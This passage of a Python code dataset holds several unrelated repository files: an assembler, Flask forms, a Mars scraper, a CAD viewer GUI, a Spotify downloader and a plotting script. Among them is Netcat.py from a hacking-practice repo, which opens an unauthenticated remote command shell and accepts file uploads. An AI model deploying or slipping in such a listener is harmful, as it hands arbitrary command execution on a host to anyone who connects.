Error(\"could not parse {} as integer in line {}\".format(token, line))\n\n self.program.set(token, line)\n\n def parse_symbol(self, line, token):\n if token == \"NEXT\":\n token = Subleq.NEXT\n elif token == \"AGAIN\":\n token = Subleq.AGAIN\n self.program.set(token, line)\n\n def parse_token(self, line, token):\n if self.token.is_seek(token):\n self.parse_seek(line, token)\n elif self.token.is_label(token):\n self.parse_label(line, token)\n elif self.token.is_number(token):\n self.parse_number(line, token)\n else:\n self.parse_symbol(line, token)\n\n def parse_finish(self):\n pass\n\n def write_start(self):\n pass\n\n def write_word(self, word):\n pass\n\n def write_finish(self):\n pass\n\n def write_output(self):\n self.write_start()\n\n for i, word in enumerate(self.program.memory):\n if word == None:\n word = 0\n elif type(word) == str:\n try:\n word = self.program.labels[word]\n except:\n Error(\"undefined label {} at address 0x{:04x}\".format(word, i))\n elif word == Subleq.NEXT:\n word = i + 1\n elif word == Subleq.AGAIN:\n word = i - 2\n word = neg2twos(word)\n\n self.write_word(word)\n\n self.write_finish()\n\n def assemble(self):\n data = self.read_input()\n\n lines = enumerate(data.split('\\n'), 1)\n tokenlists = map(lambda e: list(map(lambda tok: (e[0], tok), e[1].split())), lines)\n\n self.tokens = reduce(lambda a, b: a + b, tokenlists, [])\n\n while len(self.tokens) != 0:\n line, token = self.next_token()\n self.parse_token(line, token)\n\n self.parse_finish()\n self.write_output()\n","repo_name":"Ferdi265/hl-subleq-tools","sub_path":"hlsubleq/asm.py","file_name":"asm.py","file_ext":"py","file_size_in_byte":4707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"26450639962","text":"from flask_wtf import FlaskForm\nfrom wtforms import StringField, SubmitField, PasswordField, BooleanField\nfrom wtforms.validators import Required, Length, Email, EqualTo, ValidationError\nfrom application.models import Users, Posts\nfrom flask_login import current_user\n\ndef Unique_title(): #attempt to colaspe to singel unique function message = 'value must be unique'\n def _Unique_title(form, feild):\n if str(Posts.query.filter_by(title = feild.data).all()) != '[]':\n raise ValidationError(\"Value entered not unique.\")\n print('failed validation test for uniqueness')\n return _Unique_title\n\n\ndef Unique_content():\n message = 'value must be unique'\n def _Unique_content(form, feild):\n if str(Posts.query.filter_by(content = feild.data).all()) != '[]':\n raise ValidationError(\"Value entered not unique.\")\n print('failed validation test for uniqueness')\n return _Unique_content\n\n\n\n\n\n\n\n\n\nclass PostForm(FlaskForm):\n title = StringField('Title',\n validators = [\n Required(),\n Unique_title(),\n Length(min=2, max=100)\n ]\n )\n content = StringField('Content',\n validators = [\n Required(),\n Unique_content(),\n Length(min=2, max=1000)\n ]\n )\n submit = SubmitField('Post!') \n\nclass RegistrationForm(FlaskForm):\n\n first_name = StringField('First Name',\n validators = [\n Required(),\n Length(min=2, max=30)\n ]\n )\n last_name = StringField('last Name',\n validators = [\n Required(),\n Length(min=2, max=30)\n ]\n )\n\n email = StringField('Email',\n validators = [\n Required(),\n Email()\n ]\n )\n password = PasswordField('Password',\n validators = [\n Required(),\n ]\n )\n confirm_password = PasswordField('Confirm Password',\n validators = [\n Required(),\n EqualTo('password')\n ]\n )\n submit = SubmitField('Sign Up')\n\n def validate_email(self, email):\n user = Users.query.filter_by(email=email.data).first()\n\n if user:\n raise ValidationError('Email already in use')\n\nclass LoginForm(FlaskForm):\n email = StringField('Email',\n validators=[\n Required(),\n Email()\n ]\n )\n\n password = PasswordField('Password',\n validators=[\n Required()\n ]\n )\n\n remember = BooleanField('Remember Me')\n submit = SubmitField('Login')\n\nclass UpdateAccountForm(FlaskForm):\n first_name = StringField('First Name',\n validators=[\n Required(),\n Length(min=4, max=30)\n ])\n last_name = StringField('Last Name',\n validators=[\n Required(),\n Length(min=4, max=30)\n ])\n email = StringField('Email',\n validators=[\n Required(),\n Email()\n ])\n submit = SubmitField('Update')\n\n def validate_email(self,email):\n if email.data != current_user.email:\n user = Users.query.filter_by(email=email.data).first()\n if user:\n raise ValidationError('Email already in use')\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"MattCrutchley/flask-app","sub_path":"application/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21224107204","text":"import requests\nfrom splinter import Browser\nfrom bs4 import BeautifulSoup\nimport time\n\ndef init_browser():\n executable_path = {\"executable_path\": \"/usr/local/bin/chromedriver\"}\n return Browser(\"chrome\", **executable_path, headless=False)\n\ndef scrape_all():\n browser = init_browser()\n # visit NASA News\n url = \"https://mars.nasa.gov/news/?page=0&per_page=40&order=publish_date+desc%2Ccreated_at+desc&search=&category=19%2C165%2C184%2C204&blank_scope=Latest\"\n browser.visit(url)\n\n time.sleep(2)\n html = browser.html\n soup = BeautifulSoup(html, 'lxml')\n results = soup.find('div', class_=\"list_text\")\n news_title=results.a.text\n news_p=results.find(\"div\",class_='article_teaser_body').text\n browser.quit()\n\n\n browser = init_browser()\n # visit twitter to get Mars weather\n weather_url=\"https://twitter.com/marswxreport?lang=en\"\n browser.visit(weather_url)\n\n time.sleep(1)\n\n response = requests.get(weather_url)\n soup = BeautifulSoup(response.text, 'html.parser')\n results=soup.find_all('div',class_=\"js-tweet-text-container\")\n all_tweet=[result.text for result in results]\n weather=[]\n for x in all_tweet:\n if \"InSight\" in x:\n data={}\n data=x\n weather.append(data)\n weather=weather[0]\n new_weather=weather.replace('\\n','')\n mars_weather=new_weather.rsplit('pic', 1)[0] \n browser.quit()\n\n browser = init_browser()\n # visit the space site to get the latest pic of Mars\n space_url='https://www.jpl.nasa.gov/spaceimages/?search=&category=Mars'\n browser.visit(space_url)\n \n time.sleep(1)\n\n html = browser.html\n soup = BeautifulSoup(html, 'html.parser')\n\n browser.click_link_by_partial_text(\"FULL IMAGE\")\n browser.find_by_css('a.fancybox-next').click() \n browser.click_link_by_partial_href('/spaceimages/detail')\n browser.find_by_css('img.main_image').click()\n featured_image_url=browser.url\n \n browser.quit()\n\n\n browser = init_browser()\n # Mars Hemispheres\n hem_url='https://astrogeology.usgs.gov/search/results?q=hemisphere+enhanced&k1=target&v1=Mars'\n browser.visit(hem_url)\n\n time.sleep(1)\n\n html=browser.html\n soup = BeautifulSoup(html, 'html.parser')\n img_url = []\n\n for each_products in range(0,4):\n products = {} \n browser.find_by_css(\"a.product-item h3\")[each_products].click() \n products[\"title\"] = browser.find_by_css(\"h2.title\").text \n button = browser.find_link_by_text(\"Sample\")\n products[\"img_url\"] = button[\"href\"]\n img_url.append(products)\n browser.back() \n\n browser.quit()\n\n\n # put all variables into dict \n all={\n \"news_title\":news_title,\n \"news_p\":news_p,\n \"mars_weather\":mars_weather,\n \"featured_image_url\":featured_image_url,\n \"first_img\":img_url[0]['img_url'],\n \"first_name\":img_url[0]['title'],\n \"second_img\":img_url[1]['img_url'],\n \"second_name\":img_url[1]['title'],\n \"third_img\":img_url[2]['img_url'],\n \"third_name\":img_url[2]['title'],\n \"fourth_img\":img_url[3]['img_url'],\n \"fourth_name\":img_url[3]['title']\n}\n\n return all\n\n\n\n\n","repo_name":"busy0312/W12_Web-scraping-challenge","sub_path":"Missions_to_Mars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"21787535778","text":"from bcad.binterpreter.rqq import *\nfrom bcad.binterpreter.offscreen_display import offscreenViewer3d\nfrom bcad.binterpreter.glfw_display import glfwViewer3d\n\nfrom bcad.binterpreter.events import EVEnum, EventProcessor, ee, ep\nfrom bcad.binterpreter.singleton import Singleton\n\nimport imgui\nfrom imgui.integrations.glfw import GlfwRenderer\n\nimport json\nimport time\n\nclass MainWindow():\n def __init__(self, gui=True, pipe=None, img=None):\n self.use_imgui = gui\n self.use_occt = not gui\n self.please_stop = False\n self.rqq = rqQueue()\n self.texture_updated = False\n self.prev_pos = [0, 0]\n self.offscreen_view_size = [0,0]\n\n if self.use_imgui:\n print(\"Creating IMGUI context\")\n imgui.create_context()\n else:\n print(\"IMGUI disabled\")\n # Create a windowed mode window and its OpenGL context\n\n if self.use_imgui:\n self.canva = glfwViewer3d()\n self.canva.set_pipe(pipe)\n self.canva.set_img(img)\n self.canva.init_driver()\n self.impl = GlfwRenderer(self.canva.window)\n self.objtree = None\n self.show_objtree = True\n self.show_views = True\n else:\n self.canva = offscreenViewer3d()\n self.canva.set_pipe(pipe)\n self.canva.set_img(img)\n\n def parse_reply(self):\n rp = self.canva.pipe.recv()\n jdata = json.loads(rp)\n if jdata['rp'] == replies[RP_IMAGE_DATA]:\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK]:\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK_SET_SIZE]:\n self.offscreen_view_size = [jdata['args'][0], jdata['args'][1]]\n if (self.offscreen_view_size[0] == self.canva.view_size[0]) and (self.offscreen_view_size[1] == self.canva.view_size[1]):\n self.canva.set_image(self.canva.view_size[0], self.canva.view_size[1], data=self.canva.img.buf)\n else:\n self.canva.set_image_black()\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_ACK_GET_OBJECT_TREE]:\n objtree = jdata['args']\n self.objtree = objtree\n self.canva.reply_received()\n elif jdata['rp'] == replies[RP_NOP]:\n self.canva.reply_received()\n\n def object_node(self, node):\n if node:\n if node['children']:\n if (imgui.tree_node(node['name'])):\n for c in node['children']:\n self.object_node(c)\n imgui.tree_pop()\n else:\n imgui.text(node['name'])\n\n def object_tree(self, first_frame, x, y, w, h):\n if first_frame:\n imgui.core.set_next_window_position(x, y, imgui.ALWAYS)\n imgui.begin(\"Objects\")\n\n if self.objtree:\n self.object_node(self.objtree)\n\n hovered = imgui.core.is_window_hovered()\n wh = imgui.core.get_window_size()\n\n imgui.end()\n return hovered, wh\n\n def views_list(self, first_frame, x, y, w, h):\n if first_frame:\n imgui.core.set_next_window_position(x, y, imgui.ALWAYS)\n imgui.begin(\"Views\")\n if imgui.button('Left'):\n self.rqq.rq_set_view('left')\n elif imgui.button('Right'):\n self.rqq.rq_set_view('right')\n elif imgui.button('Top'):\n self.rqq.rq_set_view('top')\n elif imgui.button('Bottom'):\n self.rqq.rq_set_view('bottom')\n elif imgui.button('Front'):\n self.rqq.rq_set_view('front')\n elif imgui.button('Rear'):\n self.rqq.rq_set_view('rear')\n elif imgui.button('Iso1'):\n self.rqq.rq_set_view('iso1')\n elif imgui.button('Iso2'):\n self.rqq.rq_set_view('iso2')\n elif imgui.button('Iso3'):\n self.rqq.rq_set_view('iso3')\n elif imgui.button('Iso4'):\n self.rqq.rq_set_view('iso4')\n elif imgui.button('Iso5'):\n self.rqq.rq_set_view('iso5')\n elif imgui.button('Iso6'):\n self.rqq.rq_set_view('iso6')\n elif imgui.button('Iso7'):\n self.rqq.rq_set_view('iso7')\n elif imgui.button('Iso8'):\n self.rqq.rq_set_view('iso8')\n hovered = imgui.core.is_window_hovered()\n wh = imgui.core.get_window_size()\n\n imgui.end()\n return hovered, wh\n\n def mainloop(self):\n if self.use_imgui:\n self.canva.init_shader()\n self.canva.create_objects()\n \n self.rqq.rq_set_size(self.canva.view_size[0], self.canva.view_size[1])\n print(\"Waiting set size reply\")\n self.rqq.process(self.canva)\n self.parse_reply()\n \n self.rqq.rq_get_object_tree()\n print(\"Waiting get object tree reply\")\n self.rqq.process(self.canva)\n self.parse_reply()\n \n self.rqq.rq_load_image()\n last = time.time()\n first_frame = True\n while (not self.canva.should_close() and (not self.please_stop)):\n current = time.time()\n menu_bar_w_h = (0,0)\n objtree_w_h = (0,0)\n views_w_h = (0,0)\n self.canva.proc()\n if self.canva.get_need_resize():\n self.canva.set_image_black()\n self.rqq.rq_set_size(self.canva.view_size[0], self.canva.view_size[1])\n self.canva.start_frame()\n self.canva.swap_buffers()\n self.canva.poll_events()\n continue\n qlen = self.rqq.process(self.canva)\n if (current-last)>1:\n last = current\n self.rqq.rq_check_redraw()\n if self.canva.pipe.poll() == True:\n self.parse_reply()\n self.impl.process_inputs()\n imgui.new_frame()\n\n if imgui.begin_main_menu_bar():\n if imgui.begin_menu(\"File\", True):\n clicked_quit, selected_quit = imgui.menu_item(\"Quit\", 'Ctrl+Q', False, True)\n if clicked_quit:\n self.please_stop = True\n imgui.end_menu()\n if imgui.begin_menu(\"Render\", True):\n imgui.menu_item(\"Save\", None, False, True)\n imgui.end_menu()\n if imgui.begin_menu(\"View\", True):\n clicked_view_objtree, selected_view_objtree = imgui.menu_item(\"Show object tree\", None, False, True)\n if clicked_view_objtree:\n self.show_objtree = not(self.show_objtree)\n clicked_view_views, selected_view_views = imgui.menu_item(\"Show views\", None, False, True)\n if clicked_view_views:\n self.show_views = not(self.show_views)\n imgui.end_menu()\n wh = imgui.core.get_window_size()\n menu_bar_w_h = wh\n imgui.end_main_menu_bar()\n\n hovered = False\n if self.show_objtree:\n hovered, objtree_w_h = self.object_tree(first_frame, 0, menu_bar_w_h[1], 0, 0)\n\n if self.show_views:\n hovered, views_w_h = self.views_list(first_frame, objtree_w_h[0], menu_bar_w_h[1], 0, 0)\n\n if not hovered:\n # right button rotation\n if imgui.is_mouse_down(1):\n if self.canva.drag_start == None:\n pos = imgui.get_io().mouse_pos\n self.canva.drag_start = [pos[0], pos[1]]\n self.rqq.rq_start_rotation(self.canva.drag_start[0], self.canva.drag_start[1])\n else:\n pos = imgui.get_io().mouse_pos\n self.pt = [pos[0], pos[1]]\n self.rqq.rq_rotate(self.pt[0], self.pt[1])\n # left button panning\n elif imgui.is_mouse_down(2):\n if self.canva.drag_start == None:\n pos = imgui.get_io().mouse_pos\n self.canva.drag_start = [pos[0], pos[1]]\n self.prev_pos = pos\n else:\n pos = imgui.get_io().mouse_pos\n if not self.prev_pos == pos:\n self.rqq.rq_pan(pos[0]-self.prev_pos[0], pos[1]-self.prev_pos[1])\n self.prev_pos = pos\n # wheel button scrolling\n else:\n self.canva.drag_start = None\n mw = imgui.get_io().mouse_wheel\n pos = imgui.get_io().mouse_pos\n if mw != 0:\n self.rqq.rq_scroll(mw)\n else:\n if not self.prev_pos == pos:\n self.rqq.rq_move(pos[0], pos[1])\n self.prev_pos = pos\n\n first_frame = False\n self.canva.start_frame()\n imgui.render()\n draw_data = imgui.get_draw_data()\n self.impl.render(draw_data)\n self.canva.swap_buffers()\n self.canva.poll_events()\n self.canva.rq_stop()\n self.canva.pipe.close()\n print(\"GUI stopped\")\n else:\n while True:\n ep.process()\n if self.canva.pipe.poll() == True:\n rq = self.canva.pipe.recv()\n jdata = json.loads(rq)\n #print(\"rq:\", rq, \"jdata:\", type(jdata))\n if jdata['rq'] == requests[RQ_LOAD_IMAGE]:\n tex = self.canva.call_load_image()\n elif jdata['rq'] == requests[RQ_START_ROTATION]:\n self.canva.call_start_rotation(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_ROTATE]:\n self.canva.call_rotate(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_SET_SIZE]:\n self.canva.call_set_size(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_SCROLL]:\n self.canva.call_scroll(jdata['args'])\n elif jdata['rq'] == requests[RQ_MOVE]:\n self.canva.call_move(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_PAN]:\n self.canva.call_pan(jdata['args'][0], jdata['args'][1])\n elif jdata['rq'] == requests[RQ_CHECK_REDRAW]:\n self.canva.call_check_redraw()\n elif jdata['rq'] == requests[RQ_GET_OBJECT_TREE]:\n self.canva.call_get_object_tree()\n elif jdata['rq'] == requests[RQ_SET_VIEW]:\n self.canva.call_set_view(jdata['args'])\n elif jdata['rq'] == requests[RQ_STOP]:\n break\n time.sleep(0.01)\n self.canva.img.unlink()\n self.canva.pipe.close()\n print(\"OCCT stopped\")\n","repo_name":"snegovick/bcad","sub_path":"bcad/binterpreter/main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":12202,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"73778174624","text":"from datetime import datetime\nfrom random import randint\nfrom flask import Flask, render_template\nfrom configparser import ConfigParser \n\ncp = ConfigParser()\ncp.read('config.cfg')\nlower_m_delta = cp.getint('general','lower_m_delta')\nupper_m_delta = cp.getint('general','upper_m_delta')\nport = cp.getint('general','port')\n\napp = Flask(__name__)\n\n@app.route('/')\ndef root():\n\n sides = ['to', 'past']\n d = datetime.now()\n min_delta = randint(lower_m_delta,upper_m_delta)\n\n side_idx = randint(0,1)\n side = sides[side_idx]\n\n hour = d.hour\n minute = d.minute\n\n if side_idx == 0:\n minute = minute + min_delta\n if minute > 59:\n hour = (hour + (minute / 60)) % 24\n minute = minute % 60\n else:\n minute = minute - min_delta\n if minute < 0:\n hour = (hour + (minute / 60)) % 24\n minute = minute % 60\n broken_time = \"The time is {} minute{} {} {:02d}:{:02d} hrs\".format(min_delta, 's' if min_delta > 1 else '', side, int(hour), int(minute))\n actual_time = \"The actual time is {} hrs\".format(d.strftime('%H:%m:%S'))\n return render_template('home.html', broken_time=broken_time,actual_time=actual_time)\n\napp.run('0.0.0.0', port)\n","repo_name":"desonalleyne/broken_timebox","sub_path":"root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"43208896170","text":"import argparse\nimport socket\nimport shlex\nimport subprocess\nimport sys\nimport textwrap\nimport threading\n\ndef execute(cmd):\n cmd = cmd.strip()\n if not cmd:\n return\n output = subprocess.check_output(shlex.split(cmd),stderr = subprocess.STDOUT)\n\n return output.decode()\n\nclass NetCat:\n def __init__(self, args, buffer=None):\n self.args = args\n self.buffer = buffer\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n def run(self):\n if self.args.listen:\n self.listen()\n else:\n self.send()\n \n def send(self):\n self.socket.connect((self.args.target, self.args.port))\n if self.buffer:\n self.socket.send(self.buffer)\n \n try:\n while True:\n recv_length = 1\n res = ''\n while recv_length:\n data = self.socket.recv(4096)\n recv_length = len(data)\n res += data.decode()\n if recv_length < 4096:\n break\n if res:\n print(res)\n buffer = input('> ')\n buffer += '\\n'\n self.socket.send(buffer.encode())\n except KeyboardInterrupt:\n print(\"User terminated!\")\n self.socket.close()\n sys.exit()\n\n def listen(self):\n self.socket.bind((self.args.target, self.args.port))\n self.socket.listen(5)\n\n while True:\n client_socket, _ = self.socket.accept()\n client_thread = threading.Thread(target=self.handle, args=(client_socket,))\n client_thread.start()\n \n def handle(self, client_socket):\n if self.args.execute:\n output = execute(self.args.execute)\n client_socket.send(output.encode())\n \n elif self.args.upload:\n file_buffer = b''\n while True:\n data = client_socket.recv(4096)\n if data:\n file_buffer += data\n else:\n break\n \n with open(self.args.upload, 'wb') as f:\n f.write(file_buffer)\n \n message = f'Saved file {self.args.uploads}'\n client_socket.send(message.encode())\n \n elif self.args.command:\n cmd_buffer = b''\n while True:\n try:\n client_socket.send(b'l3vi4th4n@send #> ')\n while '\\n' not in cmd_buffer.decode():\n cmd_buffer += client_socket.recv(64)\n \n res = execute(cmd_buffer.decode())\n if res:\n client_socket.send(res.encode())\n \n cmd_buffer = b''\n except Exception as e:\n print(f'server kill {e}')\n self.socket.close()\n sys.exit()\n \n\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='l3vi4th4n Net Tool', \n formatter_class=argparse.RawDescriptionHelpFormatter, \n epilog = textwrap.dedent('''[Example]:\n Netcat.py -t [HOST] -p [PORT] -l -c # command shell\n Netcat.py -t [HOST] -p [PORT] -l -u=[FILENAME] # upload the file\n Netcat.py -t [HOST] -p [PORT] -l -e [COMMAND] # execute specified command\n Netcat.py -t [HOST] -p [PORT] # connect the HOST\n echo 'ABC' | ./Netcat.py -t [HOST] -p [PORT] # send the 'ABC' to HOST PORT\n '''))\n \n parser.add_argument('-c', '--command', action='store_true', help='command shell')\n parser.add_argument('-e', '--execute', help='execute specified command')\n parser.add_argument('-l', '--listen', action='store_true', help='listen')\n parser.add_argument('-p', '--port', type=int, default=5555, help='spcified port')\n parser.add_argument('-t', '--target', help='specified host')\n parser.add_argument('-u', '--upload',help='upload file')\n args = parser.parse_args()\n\n if args.listen:\n buffer = ''\n else:\n buffer = sys.stdin.read()\n\n nc = NetCat(args, buffer.encode())\n nc.run()\n\n","repo_name":"k3lpi3b4nsh33/Python-Hacking","sub_path":"1. Basic Networking Tools/Netcat.py","file_name":"Netcat.py","file_ext":"py","file_size_in_byte":4331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"10719732620","text":"import requests\nimport time\nimport downloader\nfrom auth import SPOTIFY_GET_CURRENT_TRACK_URL,SPOTIFY_GET_USER_QUEUE_URL\nfrom pprint import pprint\nfrom tkinter import *\n\nclass Spotify:\n def __init__(self):\n self.__url_gct = SPOTIFY_GET_CURRENT_TRACK_URL\n self.__url_gcq = SPOTIFY_GET_USER_QUEUE_URL\n self.__menu()\n\n def main_gct(self):\n current_track_info = self.get_current_track()\n n = current_track_info['track_name']\n downloader.Downloader(n).down()\n\n def main_gcq(self):\n\n current_track_info = self.get_current_queue()\n ls1 = list((current_track_info.values()))\n for i in ls1:\n downloader.Downloader(i).down()\n\n def get_current_queue(self):\n\n response = requests.get(\n self.__url_gcq,\n headers={\n \"Authorization\": f\"Bearer {self.__access_token_gcq}\"\n }\n )\n json_new = response.json()\n\n ls_id = []\n ls_name = []\n for i in json_new[\"queue\"]:\n if i[\"id\"] not in ls_id:\n ls_id.append(i[\"id\"])\n if i[\"name\"] not in ls_name:\n ls_name.append(i[\"name\"])\n dict_fn = dict(zip(ls_name, ls_id))\n return (dict_fn)\n\n def get_current_track(self):\n\n response = requests.get(\n self.__url_gct,\n headers={\n \"Authorization\": f\"Bearer {self.__access_token_gct}\"\n }\n )\n json_resp = response.json()\n\n track_id = json_resp['item']['id']\n track_name = json_resp['item']['name']\n artists = [artist for artist in json_resp['item']['artists']]\n link = json_resp['item']['external_urls']['spotify']\n artist_names = ', '.join([artist['name'] for artist in artists])\n\n current_track_info = {\n \"id\": track_id,\n \"track_name\": track_name,\n \"artists\": artist_names,\n \"link\": link\n }\n return current_track_info\n def __menu(self):\n self.root =Tk()\n self.root.geometry(\"1580x380\")\n\n filename = PhotoImage(file=\"light.png\")\n background_label = Label(self.root, image=filename)\n background_label.place(x=0, y=0, relwidth=1, relheight=1)\n\n img = PhotoImage(file=\"icon.png\")\n self.root.iconphoto(False, img)\n self.root.title(\"Spotify_Audio_Downloader\")\n\n self.e1 = Entry(self.root, width=40,borderwidth=10, bg=\"green\", fg=\"white\")\n self.e1.grid(row=5, column=0, columnspan=2)\n self.e2 = Entry(self.root, width=40,borderwidth=10, bg=\"green\", fg=\"white\")\n self.e2.grid(row=5, column=2, columnspan=2)\n\n self.myLabel1 = Label(self.root,text=\"Developed By Author\").grid(row=0,column=5)\n self.myLabel2 = Label(self.root,text=\"Date Created on 23/10/2022\").grid(row=1,column=5)\n self.myLabel2 = Label(self.root, text=\" \").grid(row=2, column=0)\n\n self.myButton1 = Button(self.root,text=\"Enter auth code below and press to download currently playing track\",borderwidth=5,command=self.click1,padx=20,pady=20).grid(row=3,column=0,columnspan=2)\n self.myButton2 = Button(self.root, text=\"Enter auth code below and press to download top 2 queued playlist tracks\",borderwidth=5,command=self.click2,padx=20,pady=20).grid(row=3,column=2,columnspan=2)\n self.myButton3 = Button(self.root, text=\"Press to exit the window\",borderwidth=5,command=self.root.quit,padx=20,pady=20).grid(row=3,column=4,columnspan=2)\n self.myButton4=Button(self.root, text=\"Press to clear text\",borderwidth=5,command=self.clear1,padx=20,pady=20).grid(row=7,column=0,columnspan=2)\n self.myButton5=Button(self.root, text=\"Press to clear text\",borderwidth=5,command=self.clear2,padx=20,pady=20).grid(row=7,column=2,columnspan=2)\n\n self.myLabel3 = Label(self.root, text=\" \").grid(row=4, column=0)\n self.myLabel0 = Label(self.root, text=\" \").grid(row=6, column=0)\n self.myLabel6 = Label(self.root, text=\" \").grid(row=8, column=0)\n\n self.root.mainloop()\n\n def click1(self):\n self.__access_token_gct=self.e1.get()\n self.main_gct()\n\n def click2(self):\n self.__access_token_gcq = self.e2.get()\n self.main_gcq()\n\n def clear1(self):\n self.e1.delete(0,END)\n\n def clear2(self):\n self.e2.delete(0,END)\n\n\nif __name__ == '__main__':\n Spotify()\n","repo_name":"hrshankar2002/Spotify-audio-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4487,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"28172304580","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom scipy.integrate import ode\nimport scipy.optimize\n\nimport seaborn as sns\n\nimport matplotlib\ncolors = matplotlib.rcParams['axes.prop_cycle'].by_key()['color']\nblack = matplotlib.rcParams['axes.labelcolor']\n\ntcellcolor = '#0E1E97'\ntcellcoloralt = '#0e7b97'\npmhccolor = colors[3]\ncolors = [tcellcolor, tcellcoloralt, pmhccolor]\n\nimport sys\nsys.path.append('..')\nimport plotting\nfrom lib import *\n \nplt.style.use('../paper.mplstyle')\n\ndef T7(T0, K):\n ts = [0.0, 3.5, 7.0]\n xs = odeint(fcompfull, [T0, C], ts, args=(alpha, mu, K, delta))\n return xs[-1, 0]\n\n# parameters as in Fig.3D (slowly increasing antigen availability)\nalpha = 1.2\nmu = -0.5\ndelta = 0.0\nC = 10\nT0s = np.logspace(0, 3, 50)\nKs = np.logspace(0, 3, 50)\n\n# alternative parameters as in Fig.1\n#alpha = 1.5\n#mu = 1.2\n#delta = 0.22\n#C = 10**6.7\n#T0s = np.logspace(0, 6.5, 50)\n#Ks = np.logspace(0, 6.5, 50)\n\n\nfoldexpansions = np.zeros((len(T0s), len(Ks)))\nfor i, T0 in enumerate(T0s):\n for j, K in enumerate(Ks):\n foldexpansions[i, j] = T7(T0, K)/T0\n\nfig, ax = plt.subplots(figsize=(2.75, 2.25))\nX, Y = np.meshgrid(Ks, T0s)\nplt.pcolor(X, Y, np.log10(foldexpansions), cmap='viridis')\ncbar = plt.colorbar()\ncbar.set_label('log$_{10}$ fold expansion')\nCS = ax.contour(X, Y, foldexpansions, colors='w', levels=[3, 10, 100, 400])\nax.set_xscale('log')\nax.set_yscale('log')\nplt.clabel(CS, CS.levels, inline=False, inline_spacing=2, fmt='%g')\nax.set_xlabel('$K$')\nax.set_ylabel('$T(0)$')\nfig.tight_layout()\nplt.show()\nfig.savefig('figS1.svg')\nfig.savefig('figS1.png', dpi=300)\n","repo_name":"andim/paper-tcellexp","sub_path":"figS1/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36520735809","text":"import pandas as pd\nimport requests as reql\nimport pickle\nfrom flask import Flask\nimport doc_processing\nfrom unclassified_grouping import find_group\nfrom document_similarity import *\nfrom data_extractor import *\n# from discovery_connector import call_classification\nfrom loguru import logger\nimport re\nimport os\nimport nltk\nimport configparser\nimport classifier_transactions\nfrom loguru import logger\nimport error_updation\nfrom error_updation import *\nimport datetime\nfrom datetime import timedelta\nimport os\nimport os.path\nimport shutil\nfrom dbprocess import dbprocess\nfrom build_models import unclassified_doc_update\nfrom build_models import classified_doc_update\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch.connection import create_ssl_context\nimport ssl\nfrom elastic_update import update_group_es\n\n\nconfig = configparser.ConfigParser()\nconfig.read('config.ini')\napp = Flask(__name__)\n\n#logger.add(loginfo_filename, format=\"{time:YYYY-MM-DD at HH:mm:ss} | {level} | {message}\", backtrace=True,\n# level='DEBUG', rotation=\"1 week\", compression=\"zip\", enqueue=True)\n\npath_separator = config['CLASSIFIER']['PATH_SEP']\ntemp_directory = config['CLASSIFIER']['TEMP_DIR_LOC']\nclassification_model_accuracy = config['CLASSIFIER']['CLASSIFICATION_FINAL_ACCURACY']\nsimiliarity_accuracy = config['CLASSIFIER']['DOC_SIMILIARITY_ACCURACY']\nroot_dir = config['CLASSIFIER']['TRAINING_DATASET_LOCATION']\nextraction_loc = config['CLASSIFIER']['CLASSIFIED_METADATA']\nmax_file_size = int(config['CLASSIFIER']['SOURCE_FILE_SIZE_MAXBYTE'])\nmin_file_size= int(config['CLASSIFIER']['SOURCE_FILE_SIZE_MINBYTE'])\nmodel_location = config['CLASSIFIER']['MODEL_SAVE_LOCATION']\nclass_predicted_loc = config['CLASSIFIER']['CLASSIFIED_RESULT']\nclass_error_loc = config['CLASSIFIER']['CLASSIFIED_ERROR']\nsim_template_loc = config['CLASSIFIER']['SIM_TEMPLATE_GROUP']\n\nvector_model_pkl = config['CLASSIFIER']['VEC_MODEL_PKL_NAME']\nclass_model_pkl = config['CLASSIFIER']['CLASS_PKL_NAME']\nis_model_enabled = False\nlog_level = config['CLASSIFIER']['LOG_LEVEL']\nlog_location = config['CLASSIFIER']['LOGGER_LOC']\nlog_name = 